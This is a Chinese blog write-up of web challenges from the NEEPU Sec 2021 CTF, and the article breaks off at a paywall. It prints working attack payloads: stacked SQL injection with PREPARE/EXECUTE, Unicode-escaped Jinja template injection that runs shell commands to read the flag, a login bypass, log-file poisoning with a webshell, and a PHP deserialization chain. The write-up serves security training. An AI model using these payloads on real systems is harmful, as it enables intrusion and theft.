[NEEPU Sec 2021 公开赛]WP

最新推荐文章于 2024-12-28 20:14:49 发布
原创 最新推荐文章于 2024-12-28 20:14:49 发布 · 1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#wp

本文详细介绍了在网络安全竞赛中遇到的多种WEB安全问题,包括SQL注入、编码绕过、文件读取、PHP反序列化漏洞利用等。通过分析题目中的过滤规则和代码逻辑,作者展示了如何构造payload进行攻击,例如使用Unicode编码绕过关键词过滤,利用session_upload_progress进行文件上传,并通过构造特定的PHP类和方法调用来执行后门。此外,还涉及了PHP的mail()函数和file_get_contents函数的特性,以及如何通过它们执行命令和读取文件。最后,文章提到了如何通过多步骤操作获取服务器上的flag。

[NEEPU Sec 2021 公开赛]WP

前言:

这哪是新生赛呀,web方向题目难度还是特别高的,但是复现之后感觉质量真的挺高的,这里记录下感觉有点意思的题目

随便注2.0

这里过滤了上传用了的字符:

return preg_match("/select|update|delete|drop|insert|where|rename|set|handler|char|\*| |	|\./i",$inject);

但还是先注出一些有用的数据先把:

0%27;show%0ddatabases;%23
0%27;show%0dtables;%23
得到:"@Neepu2021招新赛"和"words"

0%27;show%0dcolumns%0dfrom%0dwords;%23

a

0%27;show%0dcolumns%0dfrom%0d`@Neepu2021招新赛`;%23

a

但是当我们输入1读取数据的时候,是一个2个数据的数组,所以这里就对应words列里面的字段,即默认查询words里面的数据,原题就可以使用rename@Neepu2021招新赛修改为words就可以读取了,但这里被过滤了,原题还可以使用PDO预编译,虽然这里过滤了set,但是其实不用set也可以,payload:如下:

0';PREPARE w0s1np from concat('sel','ect flag from `@Neepu2021招新赛`');EXECUTE w0s1np;%23

这里是为了看没有绕过空格,使用的时候直接把空格改成%0d即可

The_myth_of_Aladdin

知识点:

绕过{ {}} 空格 . _

这里可以采用unicode的方法进行绕过

a

发现可以利用{%print%}绕过{ {}}

然后过滤了关键字,尝试用编码绕过,发现就unicode编码能绕过,大致payload如下:

{%print(""["\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f"]["\u005f\u005f\u0062\u0061\u0073\u0065\u005f\u005f"]["\u005f\u005f\u0073\u0075\u0062\u0063\u006c\u0061\u0073\u0073\u0065\u0073\u005f\u005f"]()[132]["\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f"]["\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f"]["\u0070\u006f\u0070\u0065\u006e"]("\u006c\u0073")["\u0072\u0065\u0061\u0064"]())%}

{%print(""["__class__"]
["__base__"]
["__subclasses__"]()
[132]["__init__"]
["__globals__"]
["popen"]
("ls")
["read"]())%}

ls命令可以成功执行,但当我们尝试读取flag的时候却不行,估计过滤了常见命令,可以使用base64 /f*绕过

最后payload:

{%print(""["\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f"]["\u005f\u005f\u0062\u0061\u0073\u0065\u005f\u005f"]["\u005f\u005f\u0073\u0075\u0062\u0063\u006c\u0061\u0073\u0073\u0065\u0073\u005f\u005f"]()[132]["\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f"]["\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f"]["\u0070\u006f\u0070\u0065\u006e"]("\u0062\u0061\u0073\u0065\u0036\u0034\u0020\u002f\u0066\u002a")["\u0072\u0065\u0061\u0064"]())%}

{%print(""["__class__"]
["__base__"]
["__subclasses__"]()
[132]["__init__"]
["__globals__"]
["popen"]
("base64 /f*")
["read"]())%}

还有一个读取文件的方法:cut 截断数组带出

("c""ut%09-c%092-40%09/fl""ag")
即("cut -c 2-40 /flag")

gamebox

知识点:

SQL万能密码

日志包含

上来一个登录框(只有username),猜测后台的SQL语句为select * from user where username = '$username',但是ban了很多字符,如or||#--等等,这里把可以通过a'='0登陆上去,原理就是username=anullnull=atrue

然后就是猜正反

然后查看服务器是nginx服务,就去包含日志文件:/var/log/nginx/access.log

然后就在User-Agent包含一句话木马

然后连蚂蚁的剑就行了

serialize_club

知识点:

任意文件读取

反序列化链构造

session_upload_progress构造session反序列化

无字母webshell

getshell提权读取flag

进去查看原代码,发现

a

存在任意文件读取,读取functions/file.php

<?php
/**
 *	@author: Ricky
 *	@function: Read file
 *	@return string
 *	@param $filename string
 *  @param $dirname string
 **/

header('content-type:image/jpeg');
$filename = $_GET['file'];
$dirname = '/var/www/html/';
if(!preg_match('/^\/|\/$|\.\//', $filename)){
   
   
    $file = file_get_contents($dirname.$filename);
    echo $file;
} else{
   
   
    die('Read fail :(');
}

发现不允许目录穿越,只允许在/var/www/html这里

然后尝试读取index.php, 发现可以读取同时包含了config/backdoor.php

<?php
error_reporting(0);
include "config/backdoor.php";
ini_set('session.serialize_handler','php');
session_start();
class neepu {
   
   
    protected
        //! Neepu
        $neepu,
        //! Memory-held data
        $data,
        //! Info
        $info;

    public function __construct() {
   
   
        $this->neepu = "<a class=\"navbar-brand\" href=\"index.php\">Serialize</a>";
        $this->info['info'] = "<a class=\"navbar-brand\" href=\"index.php\">PHPINFO</a>";
    }

    public function checkinfo() {
   
   
        if(!isset($_POST['info'])) {
   
   
            echo $this->neepu;
        }else {
   
   
            echo $this->info['info'];
            phpinfo();
        }
    }

    public function __call($name,$args) {
   
   
        echo $this->neepu;
    }

    public function __toString() {
   
   
        $this->info['info']->data;
        return "Neepu!";
    }
}
class n33pu {
   
   
    public
        //! Neepu func
        $func;

    public function __get($args) {
   
   
        $Neepu = $this->func;
        return $Neepu();
    }
}
class dumb {
   
   
    public
        //! dumb
        $dumb;

    public function silly(){
   
   
        echo "Who care about it?";
    }

    public function __destruct()
最低0.47元/天 解锁文章
[Neepuctf2021]wp
Huamang的博客
05-27 443
一个比较小众的比赛,是别学校的招新赛,不过也对外开放 记录一点有点难度的题 随便注2.0 是原题“[强网杯 2019]随便注”的变式,过滤的很多 return preg_match("/select|update|delete|drop|insert|where|rename|set|handler|char|\*| | |\./i",$inject); 空格都可以用%0a绕过,但是rename被ban了,改名不能用了,set被过滤,预处理语句也不能用了,handle也不能用了,网上流传的这三个方法都不行
NewStarCTF 公开赛赛道
shinygod的博客
10-06 2293
基础练习
neepu sec
zty___的博客
01-28 591
wp: 简单的摩斯密码:Crypto1 直接可以找到脚本网站:https://www.jb51.net/tools/morse.htm 这样就得到flag
NEEPU Sec 2023 公开赛 writeup
mumuzi的博客
05-22 3327
Neepu2023 writeup wp
Neepu Sec 2023公开赛Reverse题目复现
OrientalGlass的博客
05-22 1196
可以看到做了对flag的判断,分别截取flag的不同部分并调用不同的check函数最后将加密结果拼接起来并输出结果。text是密文,bytes是密钥,并且可以看到Mode是ECB,PaddingMode是PKCS7。sha256,也就是把上面得到的结果拼接起来进行hash(也可以运行程序通过验证得到flag)最后组合到的掩码Neepu{Pyth0n_1s_a_t?​将程序用dnSpy打开后,点击From1,可以找到check1~check5函数。可以发现是C#编写的,使用dnSpy分析。
NEEPU Sec 2023-misc方向wp
toto的博客
05-21 2533
菜的不行,二维码原题都没做出来(
2024第一届Solar杯应急响应挑战赛wp
最新发布
jnszstmei的博客
12-28 3033
题目描述:本题作为签到题,请给出邮服发件顺序。for;dkim=none;for;From: 鍏嬪競缃戜俊XXXXXXXXXXflag格式为flag{domain1|…|domainN}直接gpt秒了,flag为。
2021陇剑杯部分WP
Y-Y-K的博客
09-15 6403
写在前面的话,结局排名离谱,最后两分钟直接掉了70多名,排出100以外…很久没有打比赛了,但是也没想到国内的CTF环境已经差到这种地步了,另外就是题目都挺好,个别的题目暂时这里不给出解题过程,见谅 签到 操作内容: 看请求包,http请求返回403 Jwt 操作内容: 看cookie,jwt格式 找个在线解jwt的网站,将cookie解码,注意不要解登录失败那个,解登陆成功的 看流量包。alert(“root”) wireshark打开,包序号103 109这两个包,将文件都试下 包序号109,用echo
2020年第六届 美亚杯电子取证 团体赛 wp
ShenZ的博客
01-26 7527
2020年第六届 美亚杯电子取证 团体赛 wp一、案情简介二、检材三、题目ZelloXenoBob 张伟华Bob的桌上计算机Bob iphoneSamsung S2Bob iMACCole 冯启礼Cole桌上计算机Cole笔记本计算机Cole笔记本的随机存取记忆体Cole的PICole NASCole手机Daniel 罗俊杰Daniel的桌上计算机Daniel的MacBookDaniel的iPhone 一、案情简介 你的电子数据取证调查结果发现一个国际黑客组织牵涉这宗案件。经深入调查后,调查队伍相信该黑客组
Neepu ctf wp
lucky_boyQAQ的博客
05-25 1109
Neepu ctf wp 拿了个第一,AK了re,哈哈哈还是可以。 ID:The_Itach1 总排名: 1 分数: 8347 re OLLEH 有点可惜,本来可以一血的,被NEEPU给迷惑了,哈哈哈。 ida看,流程,动调比较快 动调绕过得到 MD5加密一下,故flag为 Neepu{a4db343d5faf70bc4fb88dd8d4dc86de} easyre 开始分析是分析exe文件,然后看了里面的一些字符串,什么.net之类的,后来发现flag在dll里面。 用dSspy打开dll,找到
维吉尼亚密码-CTFwp2
CTFwp笔记1-rsa基本知识+共模攻击
12-20 4730
CTFwp2-维吉尼亚密码维吉尼亚密码简介一、维吉尼亚密码简介二、题目:1:找出秘钥长度2:求得秘钥的每个字母3:按照秘钥和表进行解密 维吉尼亚密码简介 something:要考试了,原谅窝再水一个wp(! - !) 一、维吉尼亚密码简介 维吉尼亚密码是古典密码的一种,从凯撒密码演变而来,用多个凯撒密码组成,是多表密码的简单实现。简单说,就是按照这张表来实现: 二、题目: 数据如下 faprepeapmsstwmcxdfwfaprepeapmsstwmcxdfwfaprepeapmsstwmcxdfw
NEEPU Sec 2023 公开赛 Crypto wp 全解
qq_41626232的博客
05-21 478
Crypto wp
CCUT-SE-第一次作业-博客初体验
MUJIN1234567的博客
09-07 258
第一章 概论 计算进专业术语 软件工程 程序=算法+数据结构 二叉树 指针 程序、应用软件、软件服务 源程序、数据 动态、静态、可执行代码 软件架构 SoftwareArchitecture 软件设计与实现 Software Design,Implementation and Debug 软件构建:依赖关系、编译参数、链接参数 源代码管理 Source Code ...
南邮 ctf wp
天跃
08-02 557
1.  这题主要就是考察对PHP和shell的理解,在网上找一个PHP的在线代码运行就好https://tool.lu/coderunner/,执行的时候发现有错误,也告诉你哪错了,仔细分析一下就出来了。eval()函数会执行括号里面的语句,这种代码在现实中一般是某个黑客上传的一句话马,但在这里eval里面肯定就是flag了,将eval改成echo即可 flag:nctf{gzip_ba...
NEEPU OJ】1001--Have a try
VZZmieshenquan的博客
01-21 321
描述 Alice have a word named “NEDUOJ”.She wants to make a gift to Bob. But Alice don’t know Bob like which one about “NEDUOJ”.She only know the frist word is Uppercase.Other words may be uppercase or ...
详解php://filter以及死亡绕过
热门推荐
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
web flag.php,2020 WMCTF Web Writeup
weixin_30247833的博客
03-19 573
前言周末打了下WMCTF,Web题量大且大多需要细致推敲,以下是部分Web题解。web_checkin签到题不多说了,似乎是出题的时候,忘记改flag名了……直接包含即可:http://web_checkin.wmctf.wetolink.com/?content=/flagno_body_knows_php_better_than_me题目如下:highlight_file(__FILE__);...
php://filter的各种过滤器
qq_44657899的博客
10-27 1万+
文章目录0x01 String Filters 0x01 String Filters 1,string.rot13 string.rot13对字符串执行 ROT13 转换,ROT13 编码简单地使用字母表中后面第 13 个字母替换当前字母,同时忽略非字母表中的字符。 2,string.toupper string.toupper 将字符串转化为大写 3,string.tolower string.toupper 将字符串转化为小写 4,string.strip_tags string.strip_t
wmctf web部分wp(非官方qwq
shadowwolf’s blog
08-04 1900
web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); highlight_file(__FILE__); if(isset($_GET['content'])) { $content = $_GET['content'];
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值